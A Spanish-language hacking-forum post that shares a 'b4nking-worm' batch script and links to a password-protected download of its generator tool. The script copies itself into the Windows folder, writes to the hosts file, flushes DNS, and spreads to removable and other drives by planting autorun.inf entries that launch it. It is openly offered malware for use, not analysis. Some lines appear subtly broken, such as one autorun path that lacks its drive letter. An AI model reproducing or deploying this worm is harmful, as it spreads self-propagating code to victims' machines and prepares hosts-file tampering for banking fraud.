el gusano
antes
Código:
@echo off
:: + [ b4nking-worm ] +
:: www.aztekmindz.org octalh@gmail.com
:: – Generador Gusano bancario –
COPY %0 "C:\WINDOWS\r@mbyte.bat"
SET htxt=C:\WINDOWS\system32\drivers\etc\hosts
IF EXIST %htxt% (
echo # [+]====[ b4nking w0rm by octalh ]====[+] >>%htxt%
echo # [+]====[ b4nking w0rm by octalh ]====[+] >>%htxt%
)
IPCONFIG /FLUSHDNS
:INICIO
FOR %%A IN (D F G H I J K L M N O P Q R S T U V W X Y Z) DO CALL :VERFICAR %%A
GOTO :EOF
:VERFICAR
IF EXIST "%1:" (CALL :COPIADO %1)
GOTO :EOF
:COPIADO
COPY r@mbyte.bat "%1:\145782.bat"
echo [autorun] > "%1:\autorun.inf"
echo shell\1=abrir >>":\autorun.inf"
echo shell\1\Command="r@mbyte.bat" >>"%1:\autorun.inf"
echo shell\2=explorar >>"%1:\autorun.inf"
echo shell\2\Command="r@mbyte.bat" >>"%1:\autorun.inf"
echo shellexecute= "\r@mbyte.bat" >>"%1:\autorun.inf"
ping -n 10 localhost
GOTO :INICIO
y el cifrado
http://pastebin.com/KbiMGdPv
thanks
July(por los iconos) ,kr34t0r(por las imagenes) y mrobles(por su manual que me sirvio de inspiracion para hacer la tool)
nuevo link http://www.mediafire.com/download.php?lcebfl7n86t2ce2
Pass:H@ckXcr@ck
dudas y sugerencias bienvenidas
PD:pequeño bug de la ocx arreglada saludos!